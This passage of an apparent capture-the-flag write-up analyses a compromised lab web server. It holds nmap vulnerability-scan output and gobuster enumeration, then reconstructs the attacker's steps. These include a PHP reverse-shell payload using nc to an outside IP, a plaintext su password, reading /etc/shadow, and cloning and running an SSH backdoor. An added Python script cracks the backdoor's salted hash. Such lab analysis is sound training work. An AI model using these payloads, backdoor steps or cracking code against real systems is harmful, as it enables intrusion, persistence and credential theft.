| 22DCCD26-B68C-5905-BAC2-71D10DE3F123 7.5 https://vulners.com/githubexploit/22DCCD26-B68C-5905-BAC2-71D10DE3F123 *EXPLOIT*
| 2108729F-1E99-54EF-9A4B-47299FD89FF2 7.5 https://vulners.com/githubexploit/2108729F-1E99-54EF-9A4B-47299FD89FF2 *EXPLOIT*
| 1337DAY-ID-39214 7.5 https://vulners.com/zdt/1337DAY-ID-39214 *EXPLOIT*
| 1337DAY-ID-38427 7.5 https://vulners.com/zdt/1337DAY-ID-38427 *EXPLOIT*
| 1337DAY-ID-37777 7.5 https://vulners.com/zdt/1337DAY-ID-37777 *EXPLOIT*
| 1337DAY-ID-36952 7.5 https://vulners.com/zdt/1337DAY-ID-36952 *EXPLOIT*
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB 7.2 https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB *EXPLOIT*
| EDB-ID:46676 7.2 https://vulners.com/exploitdb/EDB-ID:46676 *EXPLOIT*
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| 1337DAY-ID-32502 7.2 https://vulners.com/zdt/1337DAY-ID-32502 *EXPLOIT*
| OSV:BIT-APACHE-2021-40438 6.8 https://vulners.com/osv/OSV:BIT-APACHE-2021-40438
| OSV:BIT-APACHE-2020-35452 6.8 https://vulners.com/osv/OSV:BIT-APACHE-2020-35452
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C 6.8 https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C *EXPLOIT*
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 36618CA8-9316-59CA-B748-82F15F407C4F 6.8 https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| OSV:BIT-APACHE-2022-28615 6.4 https://vulners.com/osv/OSV:BIT-APACHE-2022-28615
| OSV:BIT-APACHE-2021-44224 6.4 https://vulners.com/osv/OSV:BIT-APACHE-2021-44224
| OSV:BIT-2023-31122 6.4 https://vulners.com/osv/OSV:BIT-2023-31122
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| OSV:BIT-APACHE-2022-22721 5.8 https://vulners.com/osv/OSV:BIT-APACHE-2022-22721
| OSV:BIT-APACHE-2020-1927 5.8 https://vulners.com/osv/OSV:BIT-APACHE-2020-1927
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| 1337DAY-ID-33577 5.8 https://vulners.com/zdt/1337DAY-ID-33577 *EXPLOIT*
| OSV:BIT-APACHE-2022-36760 5.1 https://vulners.com/osv/OSV:BIT-APACHE-2022-36760
| CVE-2022-36760 5.1 https://vulners.com/cve/CVE-2022-36760
| OSV:BIT-APACHE-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
| OSV:BIT-APACHE-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
| OSV:BIT-APACHE-2023-31122 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
| OSV:BIT-APACHE-2023-27522 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-27522
| OSV:BIT-APACHE-2022-37436 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-37436
| OSV:BIT-APACHE-2022-30556 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-30556
| OSV:BIT-APACHE-2022-30522 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-30522
| OSV:BIT-APACHE-2022-29404 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-29404
| OSV:BIT-APACHE-2022-28614 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-28614
| OSV:BIT-APACHE-2022-28330 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-28330
| OSV:BIT-APACHE-2022-26377 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-26377
| OSV:BIT-APACHE-2022-22719 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-22719
| OSV:BIT-APACHE-2021-41524 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-41524
| OSV:BIT-APACHE-2021-36160 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-36160
| OSV:BIT-APACHE-2021-34798 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-34798
| OSV:BIT-APACHE-2021-33193 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-33193
| OSV:BIT-APACHE-2021-31618 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
| OSV:BIT-APACHE-2021-30641 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-30641
| OSV:BIT-APACHE-2021-26690 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-26690
| OSV:BIT-APACHE-2020-9490 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-9490
| OSV:BIT-APACHE-2020-1934 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-1934
| OSV:BIT-APACHE-2020-13950 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-13950
| OSV:BIT-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-2023-45802
| OSV:BIT-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-2023-43622
| F7F6E599-CEF4-5E03-8E10-FE18C4101E38 5.0 https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38 *EXPLOIT*
| E5C174E5-D6E8-56E0-8403-D287DE52EB3F 5.0 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT*
| DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 5.0 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT*
| CVE-2023-31122 5.0 https://vulners.com/cve/CVE-2023-31122
| CVE-2022-37436 5.0 https://vulners.com/cve/CVE-2022-37436
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2018-17189 5.0 https://vulners.com/cve/CVE-2018-17189
| CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333
| CVE-2018-1303 5.0 https://vulners.com/cve/CVE-2018-1303
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2006-20001 5.0 https://vulners.com/cve/CVE-2006-20001
| CNVD-2023-93320 5.0 https://vulners.com/cnvd/CNVD-2023-93320
| CNVD-2023-80558 5.0 https://vulners.com/cnvd/CNVD-2023-80558
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B 5.0 https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B *EXPLOIT*
| BD3652A9-D066-57BA-9943-4E34970463B9 5.0 https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9 *EXPLOIT*
| B0208442-6E17-5772-B12D-B5BE30FA5540 5.0 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT*
| A820A056-9F91-5059-B0BC-8D92C7A31A52 5.0 https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52 *EXPLOIT*
| 9814661A-35A4-5DB7-BB25-A1040F365C81 5.0 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT*
| 5A864BCC-B490-5532-83AB-2E4109BB3C31 5.0 https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31 *EXPLOIT*
| 17C6AD2A-8469-56C8-BBBE-1764D0DF1680 5.0 https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680 *EXPLOIT*
| OSV:BIT-APACHE-2020-11993 4.3 https://vulners.com/osv/OSV:BIT-APACHE-2020-11993
| FF610CB4-801A-5D1D-9AC9-ADFC287C8482 4.3 https://vulners.com/githubexploit/FF610CB4-801A-5D1D-9AC9-ADFC287C8482 *EXPLOIT*
| FDF4BBB1-979C-5320-95EA-9EC7EB064D72 4.3 https://vulners.com/githubexploit/FDF4BBB1-979C-5320-95EA-9EC7EB064D72 *EXPLOIT*
| FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46 4.3 https://vulners.com/githubexploit/FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46 *EXPLOIT*
| EDB-ID:50383 4.3 https://vulners.com/exploitdb/EDB-ID:50383 *EXPLOIT*
| E7B177F6-FA62-52FE-A108-4B8FC8112B7F 4.3 https://vulners.com/githubexploit/E7B177F6-FA62-52FE-A108-4B8FC8112B7F *EXPLOIT*
| E6B39247-8016-5007-B505-699F05FCA1B5 4.3 https://vulners.com/githubexploit/E6B39247-8016-5007-B505-699F05FCA1B5 *EXPLOIT*
| DBF996C3-DC2A-5859-B767-6B2FC38F2185 4.3 https://vulners.com/githubexploit/DBF996C3-DC2A-5859-B767-6B2FC38F2185 *EXPLOIT*
| D0E79214-C9E8-52BD-BC24-093970F5F34E 4.3 https://vulners.com/githubexploit/D0E79214-C9E8-52BD-BC24-093970F5F34E *EXPLOIT*
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2018-1302 4.3 https://vulners.com/cve/CVE-2018-1302
| CVE-2018-1301 4.3 https://vulners.com/cve/CVE-2018-1301
| CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763
| CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE 4.3 https://vulners.com/githubexploit/CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE *EXPLOIT*
| CD48BD40-E52A-5A8B-AE27-B57C358BB0EE 4.3 https://vulners.com/githubexploit/CD48BD40-E52A-5A8B-AE27-B57C358BB0EE *EXPLOIT*
| C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79 4.3 https://vulners.com/githubexploit/C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79 *EXPLOIT*
| C8799CA3-C88C-5B39-B291-2895BE0D9133 4.3 https://vulners.com/githubexploit/C8799CA3-C88C-5B39-B291-2895BE0D9133 *EXPLOIT*
| C0380E16-C468-5540-A427-7FE34E7CF36B 4.3 https://vulners.com/githubexploit/C0380E16-C468-5540-A427-7FE34E7CF36B *EXPLOIT*
| BC027F41-02AD-5D71-A452-4DD62B0F1EE1 4.3 https://vulners.com/githubexploit/BC027F41-02AD-5D71-A452-4DD62B0F1EE1 *EXPLOIT*
| B946B2A1-2914-537A-BF26-94B48FC501B3 4.3 https://vulners.com/githubexploit/B946B2A1-2914-537A-BF26-94B48FC501B3 *EXPLOIT*
| B9151905-5395-5622-B789-E16B88F30C71 4.3 https://vulners.com/githubexploit/B9151905-5395-5622-B789-E16B88F30C71 *EXPLOIT*
| B58E6202-6D04-5CB0-8529-59713C0E13B8 4.3 https://vulners.com/githubexploit/B58E6202-6D04-5CB0-8529-59713C0E13B8 *EXPLOIT*
| B53D7077-1A2B-5640-9581-0196F6138301 4.3 https://vulners.com/githubexploit/B53D7077-1A2B-5640-9581-0196F6138301 *EXPLOIT*
| A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F 4.3 https://vulners.com/githubexploit/A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F *EXPLOIT*
| 9EE3F7E3-70E6-503E-9929-67FE3F3735A2 4.3 https://vulners.com/githubexploit/9EE3F7E3-70E6-503E-9929-67FE3F3735A2 *EXPLOIT*
| 9D511461-7D24-5402-8E2A-58364D6E758F 4.3 https://vulners.com/githubexploit/9D511461-7D24-5402-8E2A-58364D6E758F *EXPLOIT*
| 9CEA663C-6236-5F45-B207-A873B971F988 4.3 https://vulners.com/githubexploit/9CEA663C-6236-5F45-B207-A873B971F988 *EXPLOIT*
| 987C6FDB-3E70-5FF5-AB5B-D50065D27594 4.3 https://vulners.com/githubexploit/987C6FDB-3E70-5FF5-AB5B-D50065D27594 *EXPLOIT*
| 789B6112-E84C-566E-89A7-82CC108EFCD9 4.3 https://vulners.com/githubexploit/789B6112-E84C-566E-89A7-82CC108EFCD9 *EXPLOIT*
| 788F7DF8-01F3-5D13-9B3E-E4AA692153E6 4.3 https://vulners.com/githubexploit/788F7DF8-01F3-5D13-9B3E-E4AA692153E6 *EXPLOIT*
| 749F952B-3ACF-56B2-809D-D66E756BE839 4.3 https://vulners.com/githubexploit/749F952B-3ACF-56B2-809D-D66E756BE839 *EXPLOIT*
| 6E484197-456B-55DF-8D51-C2BB4925F45C 4.3 https://vulners.com/githubexploit/6E484197-456B-55DF-8D51-C2BB4925F45C *EXPLOIT*
| 68E78C64-D93A-5E8B-9DEA-4A8D826B474E 4.3 https://vulners.com/githubexploit/68E78C64-D93A-5E8B-9DEA-4A8D826B474E *EXPLOIT*
| 6758CFA9-271A-5E99-A590-E51F4E0C5046 4.3 https://vulners.com/githubexploit/6758CFA9-271A-5E99-A590-E51F4E0C5046 *EXPLOIT*
| 674BA200-C494-57E6-B1B4-1672DDA15D3C 4.3 https://vulners.com/githubexploit/674BA200-C494-57E6-B1B4-1672DDA15D3C *EXPLOIT*
| 5A54F5DA-F9C1-508B-AD2D-3E45CD647D31 4.3 https://vulners.com/githubexploit/5A54F5DA-F9C1-508B-AD2D-3E45CD647D31 *EXPLOIT*
| 4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F 4.3 https://vulners.com/githubexploit/4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F *EXPLOIT*
| 4C79D8E5-D595-5460-AA84-18D4CB93E8FC 4.3 https://vulners.com/githubexploit/4C79D8E5-D595-5460-AA84-18D4CB93E8FC *EXPLOIT*
| 4B44115D-85A3-5E62-B9A8-5F336C24673F 4.3 https://vulners.com/githubexploit/4B44115D-85A3-5E62-B9A8-5F336C24673F *EXPLOIT*
| 4013EC74-B3C1-5D95-938A-54197A58586D 4.3 https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D *EXPLOIT*
| 3CF66144-235E-5F7A-B889-113C11ABF150 4.3 https://vulners.com/githubexploit/3CF66144-235E-5F7A-B889-113C11ABF150 *EXPLOIT*
| 379FCF38-0B4A-52EC-BE3E-408A0467BF20 4.3 https://vulners.com/githubexploit/379FCF38-0B4A-52EC-BE3E-408A0467BF20 *EXPLOIT*
| 365CD0B0-D956-59D6-9500-965BF4017E2D 4.3 https://vulners.com/githubexploit/365CD0B0-D956-59D6-9500-965BF4017E2D *EXPLOIT*
| 2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F 4.3 https://vulners.com/githubexploit/2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F *EXPLOIT*
| 2B4FEB27-377B-557B-AE46-66D677D5DA1C 4.3 https://vulners.com/githubexploit/2B4FEB27-377B-557B-AE46-66D677D5DA1C *EXPLOIT*
| 1B75F2E2-5B30-58FA-98A4-501B91327D7F 4.3 https://vulners.com/githubexploit/1B75F2E2-5B30-58FA-98A4-501B91327D7F *EXPLOIT*
| 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
| 1337DAY-ID-33575 4.3 https://vulners.com/zdt/1337DAY-ID-33575 *EXPLOIT*
| 1145F3D1-0ECB-55AA-B25D-A26892116505 4.3 https://vulners.com/githubexploit/1145F3D1-0ECB-55AA-B25D-A26892116505 *EXPLOIT*
| 108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2 4.3 https://vulners.com/githubexploit/108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2 *EXPLOIT*
| 0BC014D0-F944-5E78-B5FA-146A8E5D0F8A 4.3 https://vulners.com/githubexploit/0BC014D0-F944-5E78-B5FA-146A8E5D0F8A *EXPLOIT*
| 06076ECD-3FB7-53EC-8572-ABBB20029812 4.3 https://vulners.com/githubexploit/06076ECD-3FB7-53EC-8572-ABBB20029812 *EXPLOIT*
| 05403438-4985-5E78-A702-784E03F724D4 4.3 https://vulners.com/githubexploit/05403438-4985-5E78-A702-784E03F724D4 *EXPLOIT*
| 00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08 4.3 https://vulners.com/githubexploit/00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08 *EXPLOIT*
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
| CVE-2023-45802 2.6 https://vulners.com/cve/CVE-2023-45802
| OSV:BIT-APACHE-2020-13938 2.1 https://vulners.com/osv/OSV:BIT-APACHE-2020-13938
|_ PACKETSTORM:152441 0.0 https://vulners.com/packetstorm/PACKETSTORM:152441 *EXPLOIT*
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /downloads/: Potentially interesting folder
|_ /img/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_http-csrf: Couldn't find any CSRF vulnerabilities.
2222/tcp open ssh OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| PRION:CVE-2020-15778 6.8 https://vulners.com/prion/PRION:CVE-2020-15778
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| PRION:CVE-2020-12062 5.0 https://vulners.com/prion/PRION:CVE-2020-12062
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| PRION:CVE-2021-28041 4.6 https://vulners.com/prion/PRION:CVE-2021-28041
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| PRION:CVE-2021-41617 4.4 https://vulners.com/prion/PRION:CVE-2021-41617
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| PRION:CVE-2020-14145 4.3 https://vulners.com/prion/PRION:CVE-2020-14145
| PRION:CVE-2016-20012 4.3 https://vulners.com/prion/PRION:CVE-2016-20012
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
| PRION:CVE-2021-36368 2.6 https://vulners.com/prion/PRION:CVE-2021-36368
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
MAC Address: 02:16:E2:7D:0B:07 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/13%OT=22%CT=1%CU=36502%PV=Y%DS=1%DC=D%G=Y%M=0216E2%T
OS:M=65CB718D%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11N
OS:W7%O5=M2301ST11NW7%O6=M2301ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F
OS:4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T
OS:=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
OS:%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R
OS:=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.62 seconds
---------------- GOBUSTER ------------------
We checked whether the path the attacker used earlier (seen in the capture) to upload the payload still exists on the rebuilt box. /development/uploads/ is not there any more; we only found this:
┌──(root㉿kali)-[~]
└─# gobuster dir -u 10.10.217.114 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.217.114
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2024/02/13 13:51:21 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/aboutus (Status: 301) [Size: 316] [--> http://10.10.217.114/aboutus/]
/css (Status: 301) [Size: 312] [--> http://10.10.217.114/css/]
/downloads (Status: 301) [Size: 318] [--> http://10.10.217.114/downloads/]
/img (Status: 301) [Size: 312] [--> http://10.10.217.114/img/]
/index.html (Status: 200) [Size: 815]
/server-status (Status: 403) [Size: 278]
===============================================================
2024/02/13 13:51:22 Finished
===============================================================
*******************************************************************************************************************************
---------- CLEAN RECONSTRUCTION OF EVERY COMMAND AND STEP THE ATTACKER RAN ON AND AGAINST OUR VICTIM SERVER ----------
GET /development/uploads/payload.php (payload: <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>)
id
python3 -c 'import pty;pty.spawn("/bin/bash")'
ls -lAh
cat .overpass
su james (Password: whenevernoteartinstant)
cd ~
sudo -l
sudo cat /etc/shadow
git clone https://github.com/NinjaJc01/ssh-backdoor
cd ssh-backdoor
ssh-keygen (key file name: id_rsa)
chmod +x backdoor
./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
(The password behind the hash passed to the backdoor with -a, hashed together with the salt hard-coded in the script, was november16, which the attacker presumably used afterwards to log in through this backdoor over SSH.)
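To see what the backdoor's check actually is, here is an added example (my own code, not the page's and not the ssh-backdoor project's) that reimplements the password derivation the page relies on, sha512(password + salt) as cracked with hashcat mode 1710, parses the hash:salt line, and runs a wordlist against it. The hash and salt are the ones above; the four-word wordlist is constructed to stand in for rockyou.txt; the function names are mine.

```python
"""Added example (not the page's or the ssh-backdoor project's code): the
backdoor's password check, sha512(password + salt), and a wordlist attack on it.
The page reports hashcat mode 1710 (sha512($pass.$salt)) cracking the
hash:salt line below to 'november16'."""
import hashlib
import hmac
from typing import Iterable, Optional

# Taken from the page: hash passed with ./backdoor -a, and the salt hard-coded
# in the backdoor script, in the hash:salt layout used for hashcat.
HASHCAT_LINE = (
    "6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3"
    "e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed"
    ":1c362db832f3f864c8c2fe05f2002a05"
)


def parse_hashcat_line(line: str) -> tuple[str, str]:
    """Split a mode-1710 style 'hash:salt' line (a duplicated trailing ':salt',
    as in the file shown earlier on the page, is tolerated)."""
    parts = line.strip().split(":")
    if len(parts) < 2 or len(parts[0]) != 128:
        raise ValueError("expected <128 hex chars>:<salt>")
    return parts[0].lower(), parts[1]


def backdoor_hash(password: str, salt: str) -> str:
    """The backdoor's derivation: hex(sha512(password || salt))."""
    return hashlib.sha512((password + salt).encode()).hexdigest()


def verify_password(candidate: str, target_hash: str, salt: str) -> bool:
    """Constant-time comparison of the derived digest with the stored one."""
    return hmac.compare_digest(backdoor_hash(candidate, salt), target_hash)


def crack(target_hash: str, salt: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline attack: the salt is public (it sits in the script), so each
    candidate costs a single unsalted-strength SHA-512. First match or None."""
    for word in wordlist:
        word = word.rstrip("\n")
        if verify_password(word, target_hash, salt):
            return word
    return None


# Constructed mini wordlist standing in for rockyou.txt.
SAMPLE_WORDLIST = ["password", "123456", "november16", "whenevernoteartinstant"]

if __name__ == "__main__":
    h, s = parse_hashcat_line(HASHCAT_LINE)
    print(crack(h, s, SAMPLE_WORDLIST))
```

The point of the example: because the salt is shipped inside the script and the digest is a single plain SHA-512, one GPU run over rockyou.txt is enough; a real server would use a slow, per-user-salted KDF.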
---------------------------------------------------------------------------------------------------------
*********************************************************************************************************
We try connecting with the hash, the salt and the password november16 and, bingo, we are in: 10.10.112.242 599bd7873bd4032d
A note on the command below: publickey.txt only holds the hash:salt text, so ssh cannot use it as an identity file (it is not a private key) and the login succeeds purely on the password, because the backdoor's password callback accepts any login whose sha512(password+salt) matches the hash given with -a, whatever the username. -oHostKeyAlgorithms=+ssh-rsa is needed because the backdoor's host key is only offered with the SHA-1 based ssh-rsa signature algorithm, which OpenSSH clients reject by default since 8.8:
┌──(root㉿kali)-[~]
└─# cat publickey.txt
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05
┌──(root㉿kali)-[~]
└─# ssh -oHostKeyAlgorithms=+ssh-rsa -p 2222 -i publickey.txt james@10.10.217.114
The authenticity of host '[10.10.217.114]:2222 ([10.10.217.114]:2222)' can't be established.
RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.217.114]:2222' (RSA) to the list of known hosts.
james@10.10.217.114's password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
james@overpass-production:/home/james/ssh-backdoor$ whoami
james
james@overpass-production:/home/james/ssh-backdoor$ sudo -l
[sudo] password for james:
Sorry, try again.
[sudo] password for james:
Sorry, try again.
[sudo] password for james:
sudo: 2 incorrect password attempts
james@overpass-production:/home/james/ssh-backdoor$ sudo cat /etc/shadow
[sudo] password for james:
Sorry, try again.
[sudo] password for james:
sudo: 1 incorrect password attempt
Going through the files with the SUID bit set we found one, .suid_bash, but executed as is, with no options, it only gives us a shell as james (a SUID bash drops its effective UID back to the real one on startup unless told otherwise). For now we only get james's user flag:
james@overpass-production:/home/james/ssh-backdoor$ ls
README.md backdoor.service cooctus.png id_rsa.pub main.go
backdoor build.sh id_rsa index.html setup.sh
james@overpass-production:/home/james/ssh-backdoor$ cd ..
james@overpass-production:/home/james$ ls
